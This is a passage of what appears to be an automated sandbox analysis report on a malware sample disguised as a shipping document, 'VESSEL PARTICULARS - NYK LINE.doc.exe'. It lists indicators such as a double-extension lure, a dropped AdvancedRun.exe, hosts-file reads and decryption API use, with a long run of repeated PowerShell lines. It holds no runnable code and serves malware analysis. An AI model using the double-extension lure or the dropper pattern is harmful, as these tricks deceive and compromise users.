                      Source: 0.0.VESSEL PARTICULARS - NYK LINE.doc.exe.bb0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.VESSEL PARTICULARS - NYK LINE.doc.exe.bb0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 23.0.VESSEL PARTICULARS - NYK LINE.doc.exe.200000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 23.2.VESSEL PARTICULARS - NYK LINE.doc.exe.200000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.2.VESSEL PARTICULARS - NYK LINE.doc.exe.d0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 24.0.VESSEL PARTICULARS - NYK LINE.doc.exe.d0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 25.2.VESSEL PARTICULARS - NYK LINE.doc.exe.c0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 25.0.VESSEL PARTICULARS - NYK LINE.doc.exe.c0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: 26.2.VESSEL PARTICULARS - NYK LINE.doc.exe.2f0000.0.unpack, Nzcjjjvlottgiwy.Queues/WatcherQueue.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: VESSEL PARTICULARS - NYK LINE.doc.exe, 00000000.00000003.492753441.0000000003EC9000.00000004.00000001.sdmp, AdvancedRun.exe, 00000013.00000000.459126690.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000014.00000002.472251440.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.474256722.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000016.00000000.488640452.000000000040C000.00000002.00020000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 21_2_0040B550 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 21_2_0040B50D push ecx; ret
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: VESSEL PARTICULARS - NYK LINE.doc.exeStatic PE information: 0xA040EBAA [Sun Mar 14 03:53:14 2055 UTC]
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile created: C:\Users\user\AppData\Local\Temp\VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeFile created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

                      Hooking and other Techniques for Hiding and Protection:

                      Uses an obfuscated file name to hide its real file extension (double extension)
                      Source: Possible double extension: doc.exeStatic PE information: VESSEL PARTICULARS - NYK LINE.doc.exe
                      Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exeCode function: 19_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\VESSEL PARTICULARS - NYK LINE.doc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
